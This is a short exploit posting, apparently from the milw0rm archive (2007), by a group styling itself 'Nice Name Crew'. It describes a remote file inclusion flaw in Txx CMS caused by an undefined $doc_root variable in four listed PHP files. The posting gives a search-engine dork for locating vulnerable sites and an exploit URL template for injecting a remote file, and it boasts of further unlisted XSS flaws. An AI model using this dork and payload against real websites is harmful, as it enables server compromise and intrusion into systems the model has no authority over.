36 lines
No EOL
1.3 KiB
Text
36 lines
No EOL
1.3 KiB
Text
:::::::::::::::::::::::::::::::::::::::::::::::::::.......................
|
|
::| \ | (_) | \ | | / ____|
|
|
::| \| |_ ___ ___ | \| | __ _ _ __ ___ ___ | | _ __ _____ __
|
|
::| . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | | | '__/ _ \ \ /\ / /
|
|
::| |\ | | (_| __/ | |\ | (_| | | | | | | __/ | |____| | | __/\ V V /
|
|
::|_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___| \_____|_| \___| \_/\_/
|
|
:::::::::::::::::::::::::::::We got the nicest name in the security scene!
|
|
::::::::Info::.
|
|
::Script: Txx CMS
|
|
::Homepage:https://sourceforge.net/projects/txx/
|
|
::
|
|
:::::::::Details::.
|
|
::Type: File_Inclusion
|
|
::Dork: "txx cms"
|
|
::
|
|
::in modules/addons/plugin.php
|
|
::and modules/addons/sidebar.php
|
|
::and modules/mail/index.php
|
|
::and modules/mail/mailbox.php
|
|
::
|
|
::$doc_root is not defined
|
|
::
|
|
::http://site.com/modules/addons/plugin.php?doc_root=[vuln]
|
|
::
|
|
::
|
|
:: we also found countless xss in there
|
|
:: but we wont list em because we got more important
|
|
:: stuff to do
|
|
::::::::::::::::::::::::::::::::.
|
|
:::::::::::Additional_Information::.
|
|
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
|
|
::Contact: nne@chilloutzone.eu
|
|
::Website: http://nnc.unkn0wn.eu or http://www.chilloutzone.eu
|
|
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
|
|
|
|
# milw0rm.com [2007-09-08] |